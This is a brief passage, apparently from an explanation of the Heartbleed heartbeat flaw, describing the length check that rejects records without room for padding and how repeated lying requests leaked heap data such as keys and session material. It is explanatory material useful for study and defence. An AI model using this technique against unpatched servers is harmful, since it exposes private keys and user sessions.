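The check is deliberately on the record length rather than on the payload alone: the padding must also fit, so a record that is exactly header plus payload with no room for the 16 padding bytes is also rejected. Repeating a lying request returns a different slice of the heap each time, which is how key material and session data accumulated across many heartbeats in the real attack.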